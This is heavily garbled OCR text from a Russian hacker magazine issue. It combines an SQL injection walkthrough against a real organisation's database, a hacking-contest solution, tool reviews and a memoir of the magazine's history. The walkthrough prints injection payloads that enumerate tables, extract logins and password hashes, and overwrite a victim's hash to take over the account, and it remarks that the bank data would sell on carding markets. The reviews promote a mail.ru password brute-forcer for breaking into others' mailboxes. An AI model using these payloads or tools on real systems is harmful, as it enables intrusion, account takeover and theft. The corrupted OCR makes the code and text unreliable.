поражаюсьтем людям, которые ей так неумело воспользовались. 
Дело втом, что МББОБ содержит в себе специальную сис- 
темную базу ІМЕ0РМАТІ0І\І_5СНЕМАс полным и подробным 
описанием всей структуры таблиц, присутствующих на сер- 
вере БД. Она нам стобой сейчас очень пригодится :]. 

О Лезем внутрь 

Для извлечения названия всехтаблиця воспользовался вот 
таким выражением (в реальности оно пишется в одну строку, 
а я его разбил на несколько, чтобы затем пояснить): 



одну первую строку, найденную по заданному условию. 
Далее мы просим сервер БД отконвертировать имя 
таблицы в тип Іпіедег. Сам понимаешь, насколько это 
реально! В этом месте образуется БОБ-ошибка, которую 
мы должны увидеть в браузере. Собственно, это будет 
единственное средство «общения» с СУБД. 

В пятой строке надо указать БД с информацией о структуре, 
а в качестве дочернего элемента — список таблиц. Шестая 
строка исключит попадание в результат всякого мусора, 
временныхтаблиц и прочих малополезных сведений. 
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Уна жито наш гипіаІІ: 



ОіНраЬнІь Да<ітнісмгал 



> Путь кЗОЬ-инъекции 




Седьмая строка поможет нам исключатьте 
таблицы, которые мы уже посмотрели и не 
хотим больше видеть в результатах. Каждую 
таблицу, которую я находил, оставалосьтолько 
заключить в кавычки и дописать через запятую 
к таким же ненужным. Так можно передви- 
гаться по всему сп иску таблиц, покаунасне 
образуется полный их перечень. 

Восьмой строкой мы включаем комментарии в 
запросе, что заставляет сервер просто отклю- 
чить оставшуюся часть запроса из РНР-скрипта. 
Я стал запускать процессы восстановле- 
ния паролей один за другим. На каждую 
просьбу М550Б неприлично ругался, что, 
мол, я глуп, так как должен был бы пони- 
мать: невозможно изменитьтип строки вида 
*Ь_сІі_Ьапк_ассоипІ5, Лэ_регтІ55Іоп5 или 
іЬ_сІі_сір_и5ег5 в Іпіедег. Неужели! Пора- 
жаясь своему таланту генерировать море 
ошибок, я продолжал свои поиски и в итоге 
получил приличный перечень таблиц. 



Теперь было бы неплохо получить имена столб- 
цов в этих самыхтаблицах. Для этого нам нужен 
запрос вида: 

10' ШІСШ ЗЕЬЕСТ ТОР 1 
сопѵегС ( іпС , СОЫЛУШ_ 

БАМЕ) ЕРОМ ШЕОКМАТІСШ_ 

ЗСНЕМА . СОЫЛУДОЗ 
УШЕКЕ ТАВЬЕ_ЫАМЕ= 

' пате_оТ_СаЫе 1 
АКБ СОЫШЬ_БАМЕ БОТ Ш 
( ' о1с1_со1итп ' ) -- 



Он аналогичен предыдущему, за тем ис- 
ключением, что теперь мы рассматриваем 
таблицу СО ЮМ N5 для конкретной таблицы, 
за вычетом тех столбцов, что уже рассмот- 
рены. Еще пара минут, и я имел перед собой 
в от та кую инфу по структуре трех полезных 
таблиц: 

ЬЪ_с1і_Ъапк_ассоипЬз (ісі, 
с1іепк_ісі, паше, 2 Ір_сос 1 е, 
асИгезз, сіку_іс1, гедіоп_іс1, 
ріюпе , іах, етаіі, Ьапк_пате, 
Ьапк_ассоипк_по , Ъапк_ЬгапзіЬ_ 
по, сиггепсу_со<іе , окопк, окро, 
Ьеасі_пате, ассоипЬапк_пате) 
ЬЪ_регтіззіопз (изег_ісі, оЪбесЬ_ 
ісі, г, ѵг) 

ЬЪ_с1і_сір_изегз (ісі, Іодіп, 
раззѵгогсі, іпате, Іпате, зпате, 
<іаке_оі_Ьігк]т , розікіоп, ешаіі, 
рЪопе_ѵгогк, рЬ.опе_тоЬі 1 е , ісд. 



зкуре, Ыоскесі, раззѵ\гогс!_ехр_ 

«Таке, сопіігтсоТе , пеѵ\/_раззѵ\гагс1, 
с1іепк_іТ, сака1од_аТтіп, Таке_ 
аТТеТ, го1е_іТ, зиЬзсгіЬе) 

В первой явнохранятся банковские 
реквизиты, и это дело может немало 
стоить на рынке кардона. Вторая таблица, види- 
мо, отвечает за права на чтение (г) и запись (ѵѵ). 
Люди мы стобой порядочные, потому попробуем 
безобидно похулиганить стретьей таблицей. Для 
начала посмотрим, что в ней есть: 



10 ' ШГІОЫ ЗЕЬЕСТ ТОР 1 
сопѵегЬ(іпЬ, Іодіп) ЕРОМ ЬЪ_ 
с1і_сір_изегз ШЕКЕ Іодіп КОТ ІК 
( 1 о1Т_изег_паше ' ) -- 

Запрос подобного рода вернетлогин поль- 
зователя. А если Іодіп заменить развѵѵогб и 
добавить условие поиска для конкретного 
пользователя, то легко можно получить 
и сам пароль, что я и сделал. Пароли 
хранятся в виде гл б 5 -хэш ей, ной это дело 
поправимое. 

□ Шалости 

Люди мы стобой порядочные, законы чтим, 
а УК РФ боимся как огня. Поэтому попробуем 
наследить немного в БД, вернуть все на место 
(по возможности) и, конечно, сообщим обо всем 
в сап порт организации. 

Я взял первого попавшегося юзверя с ником 
р_Іѵг_регѵоѵ и пассом ЬГСсООе^бТСбІ 5789аес0 
82ске4(Ь49. Для входа я сгенерировал для себя 
хэш от числа 1 23 - 202СВ962АС59075В964В0 
7 1 52 О234В70. Осталосьтолько подставить его 
вместо хэша жертвы: 

10 ' ; БРБАТЕ ЬЪ_с 1і_сір_изегз ЗЕТ 
раззѵ\гогс!= 1 2 02СВ9 62АС5907 5В9 64В0 
7152Б234В70' ѴШЕКЕ 1одіп= 1 р_Ьѵг_ 
регѵоѵ ' -- 

К счастью, М 550 1_ позволяет в одной строке 
писать множество запросов. Их надо только 
отделить друг от друга точкой с запятой 
(наподобие двоеточия в старом добром 
Бейсике). Итак, запрос выполнен, пароль 
сменился и можно смело авторизироваться, 
что мы и делаем. 

Либоу этого пользователя мало прав, 
либо это такой скудный интерфейс. Можно 
пробовать зайти под другими никами или 
продолжить изучение БД в поисках чего-то 
более интересного. Я же просто отметился 
в личке у жертвы, затем повторил предыду- 
щий запрос с верным старым хэшем, чтобы 
человек мог зайти всвойаккине заподоз- 
рить взлом. А напоследок я все же напи- 
сал письмо в техподдержку — пусть руки 
выпрямляют! ИИ 



«ЛЮДИ МЫ С ТОБОЙ ПОРЯДОЧНЫЕ, 
ЗАКОНЫ ЧТИМ, АУКРФ БОИМСЯ 
КАКОГНЯ. ПОЭТОМУ ПОПРОБУЕМ 
НАСЛЕДИТЬ НЕМНОГО В БД, ВЕР- 
НУТЬ ВСЕ НА МЕСТО (ПО ВОЗМОЖ- 
НОСТИ) И, КОНЕЧНО, СООБЩИМ ОБО 
ВСЕМ В САППОРТ ОРГАНИЗАЦИИ» 
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7АСО АКА ОАШОВУЗНЧРЩ^^ 



■ ѵ-конкурс 



Салют, хакеры! Вот 
и настало время 
объявить победи 
теля первого весен 
него конкурса. Им 



стал реррег009, и 
за это он получает 
подписку на наш 



Теперь о прошлом. Февральский конкурс взлома, по моим соображениям, 
получился довольно-таки интересным, поэтому я опишу порядок его про- 
хождения чуть подробнее. Первым делом обследуем весь контент сайта и 
тутже находим 565. с — простой биндшелл под *піх. Все сценарии коррек- 
тно обрабатывают передаваемые пользователем переменные, поэтому 
нам нужны дополнительные пути. Смотрим стандартно Ь^рУ/копкигз. 
хакер. ги/гоЬоІз.М, из него открываем Іодг.ІхС Первых двух строчекдля 
дальнейшего исследования достаточно — у нас есть скрипт асІтііііп.рЬр 
и запись в поле «Соокіе»: «абтіп=0сІ4у;ра55=Ьаск;рге={е5І:;». Многие из 
участников долго не могли сдвинуться с места, хотя все, как всегда, пре- 
дельно просто ;). А что если асIтіп= ,, 0сI4у ,, , а разз="Ьаск;рге=1:е5Г? Просто 
пароль оказывается чуть длиннее, чем все думали. Подставляем 
и попадаем в админку. 

Админка представляет собой простой скрипт, позволяющий переме- 
щаться по директориям сервера и просматривать содержимое фай- 
лов/каталогов. В папке со сценарием находим дополнительный скрипт 

{ооі .рЬр. Так какчерез админку выполнять команды невозможно, то 

остается только одно — открыть *ооІ .рбр :). Это, казалось бы, обыч- 

ный сценарий для отправки письма, но... Вспомним о биндшелле. 

Теперь с помощью любого сканера портов находим открытый порт 
6655. Телнетимся на него и в ответ получаем «>>оп1у Іосаі ір іп зесиггіу 
геазопз» и закрытие соединения с другой стороны. Посмотрев сорец 
биндшелла еще раз, можно убедиться, что идет проверка на локальность 

подключения. Но вернемся кіюоі .рЬр. Заглянув через админку в 

исходник, замечаем, что переменная $1о поля «Куда:» никак не фильтру- 
ется, а сам скрипт отправляет мыло тупым коннектом на порт 25 сервера 
с хостом-подстрокой, идущей после символа «0» :). Функция іъоскореп, 
на самом деле, позволяетуказать порт после двоеточия в адресе хоста, 
поэтому вбиваем в поле «Куда:» «>>хек01осаІЬоз1::6655», а в поле«Со- 
общение:»«>>;І5>ЛтрЛетр;». На входдочернего процесса зИ нашего 

биндшелла пойдет зтф- пакет от скрипта Іооі .рИр, и команда Із 

выполнится успешно. Через админку просматриваем результат в Лтр/ 
Іетр, далее делаем «саі ту_таіІ > ЛтрЛетрр: рібогсЬеІойуапсІех.ги: 
іатІгиеоберІ:іат{гиетопеуосІерІ» и получаем па роль от аккаунта 0сІ4у 
на уапсіех.ги :). 

Остается войти в аккаунт. Понимаем, что ничего дельного тут нет, 
обращаем внимание на второй пасс — іатігиетопеуосіері и слово 
«топеу». Идем в платежки, вбиваем пасс и получаем долгожданный 
адрес/телефон (Жу ;). 



журнал на полгода. 



ш 



Несмотря на сезонные авитаминоз и депрессию, тебе в очередной раз 
предстоит одолеть наш сервер. Все подробности самого весеннего 
конкурса взлома читай на Ьир://копкигз.хакер.ги . 



іЙ 
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ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ ПОШ@ВК.КІІ / 




А ПРОГРАММА: СРР8 ЕХРЮРЕР 
ОС: УІІЧ0ОУ5 2000/ХР 
АВТОР: БИЛАЙН 




> 0РР5 Ехріогег в деле 

В последнее время все большее распро- 
странение получают беспроводные сетевые 
технологии. Сейчас уже не удивляешься ѴѴі-РІ 
сетке в своем универе или точке доступа у 
соседа с пятого этажа =). Приятно, порой зайдя 
в ресторан или кафешку, посидеть заодно и в 
Сети :). Однако ѴѴі-Рі карточка не всегда удоб- 
на, а о цене коммуникаторов я вообще молчу. 
Поэтому одним из выходов в сложившейся 
ситуации является 6РП5, именуемый в народе 
«жопорезом» =). Не будем подробно останав- 
ливаться на этом виде связи, но пару моментов 
рассмотрим. Начнем, пожалуй, с минусов: 

• низкая скорость (которая зависит от загру- 
женности каналов связи оператора); 

• нестабильное соединение (которое зависит 
опять же от оператора и прочих аномальных 
явлений, имеющих место быть). 

Зависимость вышеперечисленных факторов 
отоператора налицо. Например, при хорошем 
раскладе скорость моего коннекта достигает 
порядка 45 Кб/сек. А при плохом — падает до 
28,8 Кб/сек :(. 

Как бы там ни было, переходим к более прият- 
ным моментам, а точнее, моменту, поскольку из 
основных он один — мобильность. 6РП5 можно 
юзать везде, где есть связь. Моя стандартная 
передвижная комплектация состоит из ноута, 
подключенного к нему мобильника и установ- 
ленного 6РП5 Ехріогег'а. ѲРР5 Ехріогег пред- 
назначен для настройки 6РП5-соединения 
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компа через мобильник. Все, что оттебя 
требуется, — это подключить мобилу к компу 
и за пустить утилу. 6РР5 Ехріогег обнаружит 
модельтвоего телефона и поднимет коннект 
(про обязательное наличие 6РР5-модема вте- 
лефоне, надеюсь, отдельно говорить не нужно). 
Тулза поддерживаетогромное количество раз- 
личных моделей мобильников, перечислить 
их все просто не представляется возможным. 
Крометого, софтинка умеет считатьтрафик, что 
позволяет четко себя контролировать. Одним 
словом, тулза делает именно то, что должна 
делать. Можешь смелоустанавливать ее на 
свой ноут— пригодится еще не раз :).. 

А ПРОГРАММА: 8МАІ_І_ С0-УР1ТЕР 
ОС: УІМ0ОУ5 2000/ХР 
АВТОР: АѴ(Т) 




:ЖТИТ ~ Д ~ 



> Самая компактная утила 
для прожига болванок 



Многие из моихзнакомых имеютна вооружении 
флешку с самым необходимым софтом (втом 
числе и «боевым» =)). Да что там говорить, такой 
девайсестьиу меня. Причем большинство утил 
могут работать автономно, на сменном носителе 
и без предварительной установки. На мой взгляд, 
оченьудобно, когда утебя под рукой в любой 
момент находится софт, способный выполнять 
самые разнообразныезадачи. В одном из про- 
шлых выпусков «Х-Тооіз» я даже выкладывал 



специальный браузер для анонимного веб- 
серфинга. Ну а сейчас спешу представить 
тебе утилу под названием Зтаіі Сй-ѴѴгіІег. Да, 
эта тулза предназначена именно для записи 
дисков, но она не совсем обычная. Вот л ишь 
краткий переченьее достоинств: 

• малый размер — менее400 Кб; 

• работа без предварительной установки (мож- 
но юзать на сменном носителе — флешке или 
внешнем винте); 

• работа с 150-образами дисков (создание/за- 
пись образов). 

Кроме того, тулза позволяет закатывать на диск 
дополнительную информацию, такую как: соста- 
витель, издатель и копирайт=). Конечно, Зтаіі 
СО-ѴѴгііег не потягаться с монстрами типа Ыего. 
Как ни крути, но в 400 Кб уместить полнофунк- 
циональный пакет попросту невозможно. Да и 
не нужно это. Тулза создавалась с расчетом на 
компактность и мобильность. Мне еще ни разу 
не доводилось встречать что-либо подобное. 
Ведь часто случается так, что на чужом компе 
и резак есть, и инфа, которую закатать было 
бы неплохо, а вотудобного софта для прожига 
дисков нет. В такой ситуации спасти тебя может 
именно Зтаіі СИ -ѴѴгііег. При тестировании 
тулза весьма корректно закатала мне пару 
бэкапных дисков, и я остался ей полностью 
доволен =). Вывод, какты понимаешь, здесь 
напрашивается только один — утила однознач- 
но из разряда тизі Ьаѵе. 

Р.5. Кстати, чуть не забыл предупредить: соф- 
тинка-то фриварная, пользуйся :). 

А ПРОГРАММА: Х5РЮЕР 7 
ОС: УІІЧ0ОУ 5 ІЧТ/2000/ХР/2003 
АВТОР: Р05ІТІѴЕ ТЕСНІЧОЮСІЕЗ 

Безвозвратно ушли те дни, когда примитив- 
ным сканером сді-уязвимостей можно было 
нащупать серьезный баг. Увы, но с каждым днем 
работать становится все сложнее и сложнее. 
Хотя в этом есть один несомненный плюс — все 
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> Мощный сканеруязвимостей 



Л ПРОГРАММА: &5СРѴРТ 
ОС: ѴІІЧ&0Ѵ8 2000/ХР 
АВТОР: &АКЮ8Е 0ТА1Ч101_АУЕК 




> Шифруем очередную слитую базу :) 



Л ПРОГРАММА: СЕИОМ - МАП.КІІ ВЕШЕК 
ОС: У№0У9/*Ж 
АВТОР: СЕНОМ 




> Брутим мыльники на таіі.ги =) 



слабонервные и профнепригодные отсеиваются 
задолго до достижения поставленной цели (на- 
деюсь, ты не из их числа?=)). В прошлых выпус- 
ках рубрики я выкладывал несколько различных 
сканеров, втом числе и знаменитый РРѴ5. Что 
ж, настала пора другого, не менее полезного и 
активно развивающегося продукта — ХЗрібег. 
Наверняка, тебе доводилось сталкиваться с по- 
добным детищем конторы РоБІбѵеТесЬпоІодіез. 
Однако седьмая версия софтины заслуживает 
отдельного внимания. Для начала, потрадиции, 
приведу краткие характеристики продукта: 

• полная идентификация сервисов на случай- 
ных портах (дает возможность проверки на 
уязвимость серверов с нестандартной конфи- 
гурацией, когда сервисы имеют произвольно 
выбранные порты); 

• эвристический метод определения типов и 
имен серверов (НТТР, РТР, 5МТР, РОРЗ, 0Ы5, 
55Н) вне зависимости от их ответа на стандарт- 
ные запросы (позволяетопределить настоящее 
имя сервера, если используется фей к) ; 

• обработка РРС-сервисов (ѴѴіпбоѵѵв и *піх) с их 
полной идентификацией; 

• поиск разнообразных уязвимостей вѵѵеЬ-кон- 
тенте: 501-инъекций, инклудов, межсайтового 
скриптинга (Х55), НТТР Резропве ЗрШіпд. 
Крометого, программа брутит всевозможные па- 
роли, выявляя наиболее слабые, проводит поиск 
и анализ директорий, доступныхдля просмотра 

и записи, и делает многое другое. Необходимо 
отметить, что, несмотря на то что я не привык 
полностью возлагать все обязанности на сканер, 
этатулза мне пришлась по душе. Одной изудоб- 
ныхфичей является проверка списка ресурсов 
по листу. Представь, вечерком ты составляешь 
список предположительно бажных ресурсов, 
заливаешьутилу на дедик, запускаешь и спокой- 
но идешь пить пиво/смотреть футбол/ксвоей 
девушке (а лучше все вместе. Кстати, в послед- 
нем случае, думаю, твоя девушка будет просто 
ошарашена =). В общем, неупусти возможность 
заюзать столь полезную и нужную в повседнев- 
ной рутин етулзу. 



Проблема безопасного хранения данных 
актуальна всегда, а особенно когда эти 
данные не совсем легальные =). Короче, у 
меня ктебе есть несколько вопросов: как 
и где ты хранишь свои базы, слитые на той 
неделе с поломанно го хостера? А картончик 
самерскогошопа, хакнутого днем раньше? 

А где исходники твоего нового троя? :) Что, 
бросает в дрожь? Или мне продолжить? =). 
Заметь, столь безобидные вопросы в следу- 
ющий раз могу задать тебенея, а товарищ 
следователь, случайно зашедший навестить 
тебя утром ранним (вот откуда возникла 
поговорка «Утро добрым не бывает» :)). Гулял 
всвоевремяпо андеграунду даже такой 
специфический стишок, который я позволю 
себе процитировать: 

Мне не страшна паранойя, 

Мне не страшен доктор-садист, 

Мне не страшны политизгои, 

Я — алкоголик, я — оптимист! 

Ой, о чем это я :). В общем, надеюсь, ты меня 
понял — шифровать нужно все. Воттолько 
чем? Многие предпочитают юзать крип- 
токонтейнеры, но зачастую они неудобны. 
Поэтому предлагаю тебе попробовать 
воспользоваться тулзой сІзСгурС Утила 
используеттакой алгоритм, как АЕ5, и весит 
всего 24 Кб! Причем, какты догадываешься, 
тулза работает без установки, то есть носить 
ее на флешке сам бог велел. Пользоваться ей 
проще простого: достаточно при шифрова- 
нии выбрать ЕКІСРУРТ, перетащить в поле 
проги требуемый файл и ввести пасс, а при 
дешифровке лишь сменить режим (Мобе) на 
ОЕСРѴРТ и подтвердить пароль. Кроме того, 
предусмотрены горячие клавиши, облегчаю- 
щие работу с тулзой. 

Воттакая замечательная утила, настоятель- 
но рекомендую обратить на нее внимание. 
Как говорится, кто предупрежден — тот 
вооружен :). 



Прежде чем начать описывать очередную тулзу, 
вкратце скажу, что побудило меня выложить 
ее на диске. Во-первых, бесконечные мольбы/ 
просьбы/еіс сломать мыло чьей-либо девушки/ 
дедушки/бабушки достали меня окончательно 
(в случае с девушкой зачастую проще найти 
другую девушку =)). Во-вторых, как ни крути, но 
брутумирает. Это раньше можно было запустить 
Вгіііііб АЕТ2 и получить пасс на мыльникДеІпеі/ 
Др и дальше по списку. Сейчас в 90% случаев 
нарываешься либо на тайм-аут, либо на времен- 
ную блокировку аккаунта. Однако возможность 
брута пока еще есть. Наглядным примером тому 
служит СеКІоМ — таіі.ги Ьгиіег. Этот брутер 
представляет собой перловый скрипт, который 
использует брут через веб-аутентификацию. 
Если ты заметил, то на таіі.ги . при переборке 
пассов через веб, твой айпишникне кидают 
в блэк, да и тайм -аут отсутствует. Это и позво- 
ляет брутеру делать свое дело, причем вполне 
успешно. Отличительными особенностями тулзы 

ЯВЛЯЮТСЯ: 

• МНОГОПОТОЧНОСТЬ; 

• возможность использования СОКСОВ; 

• ведение подробного лога. 

Скрипт юзает несколько файлов: 

• ппаіІ.М — здесь лежат мыльники на брут; 

• раББ.М — здесь лежит словарике паролями. 
В процессе работы брутер создает еще два 
файла: 

• Ьгиіе-таіІ.М — сюда скрипт пишет сбручен- 
ный пасс (вид: мыло/пасс); 

• Іод.М — здесь лежитлог . 

Как видишь, все довольно просто, так что про- 
блем возникнуть не должно. Смело бери брутер 
на вооружение, заливай на свой забугорный 
шелл и жди результатов, все у тебя получится :). 
Р.5. Кстати, такая технология брута, какты по- 
нимаешь, подходит не только для таіі.ги. Если 
утебя прямые руки и трезвый мозг (оба пункта 
обязательны), тоты без особого труда сможешь 
реализовать нечто подобное и под другие веб- 
сервисы. В любом случае не забудь поделиться 
своим детищем со мной =) лг 



/091 



ХАКЕР 04 /100/ 07 






^ сцена 



ДАВАЙТЕ СРАЗУУСЛОВИМСЯ: «ХАКЕР» ПРИДУМАЛ 
НЕЯ. ВООБЩЕ, ИДЕЯ СДЕЛАТЬ ЖУРНАЛ С ТАКИМ 
НАЗВАНИЕМ ВОЗНИКЛА В НЕДРАХ КОМПАНИИ, 

И ЭТО ДОЛЖЕН БЫЛ БЫТЬ ГЕЙМЕРСКИЙ ЖУРНАЛ. 

А Я В ЭТО ВРЕМЯ АКТИВНО ПИСАЛ О ХАКЕРСТВЕ 
В ДРУГИХ ИЗДАНИЯХ И СЧИТАЛСЯ СПЕЦИАЛИСТОМ 
В ЭТОЙ ОБЛАСТИ. А ВСЕ ПОТОМУ, ЧТО ВНЕ РАБОТЫ 
Я ЖИЛ В ДВУХ ІРС-СЕТЯХ: БАІ.МЕТ И ЕРМЕТ, ЗАНИ- 
МАЯСЬ РАЗЛИЧНЫМИ ШАЛОСТЯМИ С НЕСКОЛЬКИ- 
МИ ПРИЯТЕЛЯМИ. 
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00 • Синтез и Федя 00 

оч 

Оч Добрянский рабо- 



00 



тали в крутом жур- 



^ нале «Компьютер и ^ 
Жизнь», но из-за кри- 
зиса 1998 года журнал 
этот закрылся. Серега 
тогда активно тусо- 
вался на ІРС и писал 
в том журнале о хаке- 
рах и андеграунде. 



• ЗІЫіег позвал 
Добрянского 
делать «Хакер», 
а Ѳатеіапб при- 
гласила игрового 
маньяка Дениса 
Давыдова. 

• Синтез открыл 
ігс-канал #хакер на 
далнете. Позже он 
отдал канал СЫ к'у. 



00 

О* 

а* 



• Вышел в продажу первый номер жур- 
нала. Успех: весь тираж смели с лотков в 
Москве за 2 часа, причем в продажу он 
поступил в 6 часов вечера. Кстати, хоть 
журнал и вышел в феврале, на нем стояла 
цифра 1/99 — это был первый номер года 
и вообще первый номер. Так что потом 
приходилось издаваться чаще, чем раз в 
месяц, чтобы успеть сделать 12 выпусков 
за год. Именно из-за этого обстоятельства 
«Хакер» до сих пор выходит позже, чем 
большинство журналов :). 






см 

о 



• Синтез и Федя решили, что пора поде- 
литься с народом опытом западла и сдедали 
рубрику «Западлостроение». Федя написал 
хитовую статью о том, как нагадить соседу, 
заглушив ему телик. 

• По всем рекламным агентствам и рекламо- 
дателям было разослано скандальное письмо 
учредителей журнала «бате.ЕХЕ» с обсира- 
нием «Хакера» и призывом не рекламиро- 
ваться в нем и вообще сделать все, чтобы его 
закрыли. Это письмо было тут же опубликова- 
но во втором номере журнала :). 
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51№ег: 

Мой модем не отключался 24 часа в сутки, используя редайлер для раз- 
рывов и ботов для логирования и управления, когда меня не было перед 
монитором. И уже тогда мы с ребятами в различных каналах обсуждали, 
как не хватает нормального печатного журнала для хакеров. Нам всем 
было что сказать на этутему. 

Настал 1 998 год, финансовый кризис в стране. Многие издательские 
дома и отдельные журналы умерли. В ѲатеІапсГе решили, что это от- 
личный шанс для запуска нового проекта, на почти пустом рынке. Тогда 
то и нашли меня и Дениса Давыдова, мы возглавили проект «Хакер» и 
начали подготовку первого номера. Всю геймерскую часть (а она зани- 
мала 80% журнала!) вел Дэн, остальная титаническая куча из четырех 
материалов была на мне :]. 

Я все время говорил, что журнал стаким названием должен больше 
места уделять взлому, а игры — это дополнение. Тысячи писем от чита- 
телей подтверждали мою шаткую теорию. Дэн со мной согласился, и мы 
начали постепенно менять все в сторону взлома. 

Через год (или больше?) Дэн сказал, что хочетуйти. Его можно было 
понять — геймерская рубрика сократилась до 20%, ему негде было 
развернуться, а это реальноталантливый парень (но об этом позже). В 
общем, Дэн ушел делать свой журнал. Несколько инвесторов пригласи- 
ли его создать самый крутой и самый интересный журнал для геймеров. 
Так появилась«Игромания», котораятутже начала расти космическими 
темпами и до сих пор является лидером рынка (вот именно это под- 
тверждает неоспоримый факт талантливости Дениса). 

Я же в это время стал пересобирать команду. Из старой банды у меня 
было несколько постоянных киллеров: Федя Добрянский ака Ог.СосІ, с 
которым мы работали еще до «Хакера»; Саша Черных ака Ноіоб, которого 
мне порекомендовали парни из «Страны Игр»; Данечка Шеповалов ака 
Оапуа. Я уже непомню.какмысДаней познакомились, но точно помню, 
что после первого разговора с ним я понял, что мой доктор был прав — я 
действительно страдаю шизофренией, так кактолько что очень мило 
пообщался с самим собой. Не взять человека, строение ДНК которого 
было нагло спиз...ноу меня Институтом мозга, я не мог. Даня сразуже 
стал ответственным за рубрику «Хумор». Еще Саша Сидоровский ака 
2роізоп5, который достался мне в наследство от Дэна, так как писал об 
играх. Это был один из лучших авторов в журнале в смысле стиля и до 
сих пор самый близкий мне человек в смысле понимания. Еще АѵаІапсИе 
— самый скромный и застенчивый парень в нашей тусовке, при этом са- 
мый ответственный и трудолюбивый, модник, любимец богов, будущий 
квантовый физик. Крометого, были Курт, Мишган, Мэл, Андрей Князев, 
Реланиум, Кибизоид и прочие отличнейшие парни. Курт, кроме работы 
вжурнале, еще сделал первый сайт «Хакера». Мишган и Мэл взрывали 
массы своими ошеломляющими материалами про взлом почтовых сер- 
ваков, домофонов, хостингов и прочего. Киби убил всех веб-мастеров, 
рассказав, как использовать для взлома метатеги. Но этого было мало, 
мне нужна была настоящая мафия. 

Первой моей большой удачей был ЗісІеХ. Он написал мне письмо, что 



неплохо разбирается во фрикерстве и хотел бы попробовать себя в 
журнале. Он мне понравился сразуже. В нем чувствовалась скрытая 
энергия и огромный потенциал. Со временем именно он возглавил 
рубрику «Взлом». 

Второй удачей были два брата-акробата Миша Терехов ака Зігапдег и 
Максим Зелененкоака Махх. Эти ребята все делали вместе: каждый 
материал, каждое обсуждение на редколлегии, каждую пивную тусу 
«Хакера». Интересно, это они придумали групповухи с девочками, или 
это было еще до них? В общем, М&М взяли на себя «РС_2опе» и стали 
нашими экспертами по нестандартному софту. 

Третьим шедевром стал М З.АзЬ. Этот питерский развратниксразу 
сказал, что он софтоманьяк, веб-извращенец и готов ради этого на все. 
Рубрика «Юниты»тутже была отдана ему на растерзание. 

А потом уже пошел такой замес! Журнал стал лидером компьютерной 
прессы. На насжаловались, нам писали гневные письма во все минис- 
терства, нас обожали и ненавидели, нам присылали наши же статьи, 
желая статьавтором, нам приносили пиво в редакцию, приглашали в 
телик, на радио. То, о чем мы та к сильно мечтали в середине девяностых, 
сбылось в начале двухтысячных. Заявлять, что «я работаю в "Хакере"», 
стало круто для открывания любых дверей. 

Даже гаишники иногда нас отпускали, когда мы показывали им наши 
хакерские ксивы. Постоянные пьянки в компьютером клубе «Нирва- 
на» всей редакцией сделали это место суперпопулярным. Там же мы 
провели первый чемпионат по взлому нашего сервака. Кстати, сервак 
никто не порутил; от безысходности его положили ООоЭ’ом, нотак какой 
поднимался каждые минут20, его досили до упора :). За это надо сказать 
отдельное спасибо Борису Скворцову, нашему админу сетки, который ни 
хрена не разбирается в никсах, зато богтехнологии ѴѴіпсІоѵѵз КІТ. 

Со временем я понял, что стал старым, мерзким и беспонтовым, что 
мне больше нравится трахаться одновременно стремя девушками, 
чем стремя серваками. И я решил уйти с должности главВреда. Ядыч 
гармонично вписался в мое кресло. Ая стал издателем «Хакера» и начал 
управлять всеми его бизнес-процессами. 

Потом Ядыча сменил Куттер, а его, в свою очередь, сменил Никитос. За 
это время я запустил «Железо», «Мобильные Компьютеры», «Лучшие 
Цифровые Камеры», «Оідііаі Сгеаііѵе АНз», «5ѴКІС», перепозициони- 
ровал спецвыпуск«Хакера» в журнал «Спец» и... устал. Устал от новых 
журналов, оттехнологий, компьютеров, гаджетов, железок. Время 
изменилось, компания изменилась, и я изменился вместе сними. Мне 
захотелось заниматься только креативом, а если и продолжать работу 
в издательском бизнесе, то в чем-то нетехнологичном. И я ушел из 
ѲатеІапсГа вообще. Ушел делать свое креативное агентство 2Еипку. 

А через некоторое время одна моя подруга позвала меня управлять 
новымжурналом, который был совсем не о компьютерах. И я согла- 
сился. Сейчас я делаюжурнал «Папарацци» и занимаюсь креативом в 
2Еипку. Хочешьузнать что-то об истории «Хакера» подробнее, пиши на 
зегдіоЕШипку.ги, если что-то забыл — расскажу. 
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Это не серийный убийца, это Игорь Пискунов. Он придумал журнал «Хакер» Основатель секты «Минету Ослика» Даня Шеповалов 



Даня Шеповалов: 

В конце славных девяностых (Даня закуриваеттрубку и поправляет 
теплый клетчатый плед на коленях), я надрал Яндекс и Рамблер так, что те 
выдавали мой сайт первым по запросам «юмор», «фанки» и «геаі гоЬоіз 
бопЧсІіе». Сделать это было просто, потому что роботы поисковиков в 
то время были тупы как первокурсница железнодорожного колледжа. Син- 
теза тогда нашли где-то на помойке, откачали и сделали главредом, а он, в 
поисках людей для нового журнала, через Яндекс нашел на помойке меня. 
Официальная частьзакончена, итеперь мы наконец можем поговоритьо 



цифровых наркотиках и африканских шлюхах! И вот что я вам о них скажу, 
парни. Меня это все никогда не интересовало. Все эти Космосы, Ослики 
и прочее, если кто помнит, — это полная чушь. На самом деле, я носил бе- 
ленькую рубашечку, пиджачок, очочки и покупал девочкам сахарную вату, 
а кто писал про Космос, я не знаю, меня подставили. Главное, вы, парни, 
голосуйтеза меня на Выборах-2008! Сделаем эту страну лучше! Пенсио- 
нерам — пенсию, студентам — стипендию! Рейвжив! Виктор Цойжив! С 
вами был Даня Ше, ѴЭ Телеканала «Духовность». 




• Запустили пер- 
вый вариант сайта 
ѵѵѵѵѵѵ.хакер.ги, кото- 
рый сделали парни 
Кигі и йоС. Тогда 
на сайте вообще 
ничего не было, 
кроме анонсов све- 
жих номеров. 




Ф* • Арт-директор Руслан Рубанский делает 
Оч для журнала большой киберпансковский 
редизайн и, самое главное, рисует новый 
2 логотип, с которым и выходит октябрьский 
номер 2000 года. 

• Вместе с логотипом поменяли и типогра- 
фию: бумага теперь глянцевая, а журнал не 
рассыпается на отдельные листки. 



О • Выход первого спецвыпуска «Хакера». Он 

о 

О содержит «лучшие материалы за 1999 год». 

Очевидно, для тех, кто пропустил какой-то 
^ из журналов в прошлом году. 

• Игровой раздел по просьбам читателей 
стремительно тает: теперь это только 

1 1 полос. Раньше было 85. 

• Первая статья Дани Шеповалова: 
про Дважды Будду Советского Союза, 
Величайшего Гуманиста Всех Времен и 
Народов и восьмое воплощение Вишну. 



О • Даня занялся 
О поэзией: «Старый 
пират торговал на 
2 Сенной, солнышко 
теплое этой весной. 
Выбиты зубы, в лег- 
ком заточка: на 1 С 
работала дочка». 
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Федя: 





До 1 998 года мы с Синтезом работали 
в журнале «Компьютер и Жизнь». Но 
